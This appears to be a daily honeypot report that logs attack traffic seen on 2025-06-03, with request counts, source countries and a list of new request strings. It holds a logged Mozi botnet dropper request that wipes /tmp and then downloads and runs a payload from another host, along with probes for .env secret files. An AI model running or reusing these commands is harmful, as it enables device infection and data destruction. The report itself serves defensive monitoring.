Skip to main content
  1. Daily-Posts/

Report: 2025-06-03

·683 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-03
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).

There are 89 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1520 requests were recorded during the day, originating from 1 different countries, with a peak of 643 requests coming from JP.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
120.86.253.229GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1282GET /core/.env.prod HTTP/1.1
1392GET /sources/.env.production HTTP/1.1
1402GET /sources/.env.prod HTTP/1.1
1532GET /test.dat HTTP/1.1
1591GET /45.txt HTTP/1.1
186164\x00
1871\x87\x00\x00\x00IIMBTIJIBN\x08\x03\x00\x00{\x99Caig\x9C\x03\xC7U\x0E\x19\xB1\xDE\x9E\x84\x89\x8Bh\x97\x04FE\x8F\x01\x95\x09\xF2k\xFA oyv\x09\xF6
1881GET /cmdoutput HTTP/1.1
1911GET /wh/glass.php HTTP/1.1
1921POST /nvidia_license_upd.php HTTP/1.1
1931GET /download/1.txt HTTP/1.1
1941\xC5\xB5
1961GET /beacons/ HTTP/1.1
2001GET /upaid.exe HTTP/1.1
2011\x00\x00\x00\x15\x00\x00\x00\x02AA
2021`\x00\x00\x00
2031\x00\x0E8Z\x9A}b]\x82\xC6\x9A\x00\x00\x00\x00\x00
2051\x00\x00\x00
2201GET /login?next=. HTTP/1.1
2211GET /font/main-webfont.woff2 HTTP/1.1
2271\xFF\xA2\xFF\x00\xFF=\xFF\xAD\xFF\x00\xFF\xD1\xFF\xD8\xF1\xAD\xFF\xBEH\xFB_5\xFF\xAD\xF1
2301GET /BoPai.xq HTTP/1.1
2401GET /extensions/a586bc8a-728c-4d06-8180-befb9e20c408 HTTP/1.1
2481POST /ymybisvimqjoknhmgryit/getocmskdmsm/ HTTP/1.1
2491GET /c2 HTTP/1.1
2541GET /DBds HTTP/1.1
2561GET /api/getit HTTP/1.1
2701GET /s?ie=utf-8&tn=baidu&rsv_pq=vepmbtt4yo7dk172&rqlang=cn&rsv_t= HTTP/1.1
2711POST /session HTTP/1.1
3001GET /test.jpg HTTP/1.1
3131\x96\x00\x00\x00\x99\x01\x00\x00\x8E\x00\x00\x00x\x9Ccd \x00\x5C\x5C\x83\xBDC\xFC\x03t\xC3L\x8D\xFD\xBC\xDDBKR\x8BK\x18\x10\x5C\xB0\x12. f\x04\xE2\x09\xFFe\x0Cf\x9F\xBC\x01b2x2\xE41\x940\xA42\xE40h0\x041h2(0X0\x181\x982\x983\x980\xF8\x00y\xEE\x0C\x99\x0C\xE9\x0C\x89\x0CI@\xBA\x04\xC8\xF7\x03\xAA-a(g\xC8g(b\xC8\x06\xF2\x9D\x81\xAC< LeH\x06\x8Ag\x82y$\x01\x1EM\x81\xABE\x0C\x0C\x07V\x1Ck@\x97b$\xCD\xA4\x81\x01\x00\x04\xF2\x1F=
3211\x22\x00\x00\x00
3381\x00\x0E8K\x22\x8D{\xEA\x1E\x11\xAF\x00\x00\x00\x00\x00
3591GET /OdinHttpCall1748970201 HTTP/1.1
3611GET /odinhttpcall1748970201 HTTP/1.1
3691GET /Odin/http/call1748970201 HTTP/1.1
3771\x00\x0E8P\xB7\xE8\xE5\x10\x8FI~\x00\x00\x00\x00\x00
4131POST /kpi HTTP/1.1
4281GET /fsxlxhxzaf.png HTTP/1.1
4461ABCDEFGHVCMD\x00\x00
4511GET /1.txt HTTP/1.1
4551GET /center/user_sid HTTP/1.1
4561POST /nation.php HTTP/1.1
4621GET /ui/authentication HTTP/1.1
4721\x00censys\x00censysio\x00vt100/9600\x00
4891GET /jquery/2.0.1/jquery.min.js HTTP/1.1
4981asdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasd
507132\x00
5161GET /1.dll HTTP/1.1
5321GET /jquery.js HTTP/1.1
5331\x00\x00\x00\xC0\xFESMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x08\x00\x01\x00\x00\x00\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02\x22\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x0E\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00
5411GET /2jjd7VgJVdKDI4Ih4eB63gTcZqdcCuq-35nmN8xhwTM8_uHq3BUqs9Zb_nf_C7AzNzvltmRoSf6-WRNz- HTTP/1.1
5421GET /1.exe HTTP/1.1
5431GET /9lqF HTTP/1.1
5461POST /QKBFJBVZsPKeqFS/HAchGeCttVyEtqZ.php HTTP/1.1
5471GET /s1/index.htm HTTP/1.1
5511GET /Qi7wAH39 HTTP/1.1
5521GET /MYMj HTTP/1.1
5581\x10\x00\x00\x00\x02\xB1\xD7\x02\x00\x00\x00\x00\xCA\x00<9
5671\x9F\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x80\x00\x08\x00\x00\x00\xD3\xC3\xBB\xA7\xBD\xF8\xC8\xEB\x04\x00\x00\x80\x00\x1D\x00\x00\x00DESKTOP-9YRLE7
5851\x11\x00\x00\x00\x01\x00\x00\x00n\x00\xE4!\xC1~/#u
6531\x00\x0E8\x89\x15\x1AR \xEC,\x14\x00\x00\x00\x00\x00
6731\x00\x0E8\xEA?x\xD1\x1A\xD4\x09\xE6\x00\x00\x00\x00\x00
6791GET /wiki HTTP/1.1
6821GET /common2/out/1 HTTP/1.1
6831GET /Dem7kTu/Login.php HTTP/1.1
6851GET /llq.rar HTTP/1.1
6891GET /kY8a HTTP/1.1
7141GET /tat HTTP/1.1
7161GET /common2/out/2 HTTP/1.1
7211GET /manjusaka/static/ HTTP/1.1
7261GET /fssdcsrweqww.ini HTTP/1.1
7271GET /b.gif HTTP/1.1
7461GET /search/s.php?i=1&id=APOX8NWOV42320 HTTP/1.1
7501GET /trx38.zip HTTP/1.1
7701GET /JYNl HTTP/1.1
7771TQ8zyt9Dz3
7781\x9E\x00\x00\x00IIMBTIJIBN\x08\x03\x00\x00{\x99Caig\x9C\x03\xC7eB\xC5\x09\xC1\x18\x11\x1A\x91\x87ppiX[os\xAFAEjp\xBF\x85%\x03\xDE\x08!\x91aa\xD3\xE2\x88\xBA\x07\x04R\x1C\xD8\xA5]\x5C\x83\xBDC\xFC\x03t\x83\x82=}\x5C\xC2\x22\xE8\xEF\xB0A\x02\x0CY\x18\x18\xFE\xF330\xCC\xFC\xCFH\x86n\xA33o\x8C\x0CNm44\xDF~\x8D,\xDB\xCF\xDDS Q\x87_iN\x0EYV\x91\x00!add\xA2k\xAEkl\xA0`hbehJ\x8C^\x00\xCEi\x1B!
7811GET /1.jpg HTTP/1.1
7901GET /viwwwsogou?op=8&query=%E7%A8%8F%E5%BB%BA%09%E9%BE%90%E1%B7%A2 HTTP/1.1
7931GetRemoteShellCode_52\x00
7941GET /202312082118335862cd360.bmp HTTP/1.1
8051GET /Tan.jpg HTTP/1.1
8171GET /test7.jpg HTTP/1.1
8181GET /mine/random.exe HTTP/1.1
8331GET /MSyD HTTP/1.1
8441GET /test6.jpg HTTP/1.1
8491POST /api/attach HTTP/1.1
8621GET /zMLUH93A HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0643JP
1192US
296DE
392BG
487GB
563IN
654CN
752NL
848HK
935SC
1026CA
1124PL
1213CH
1312GH
149AO
158NG
166PT
176VN
185ZA
195TR
204IL
214ID
223AZ
233BE
243SG
253IR
263KZ
273TH
282MD
292KW
302UA
312RU
322IE
331CZ
341BR
351PA
361TW
371DZ
381ES
391KR
401SE

Related

Report: 2025-06-02
·353 words
Repport Daily
Report: 2025-06-01
·345 words
Repport Daily
Report: 2025-05-31
·303 words
Repport Daily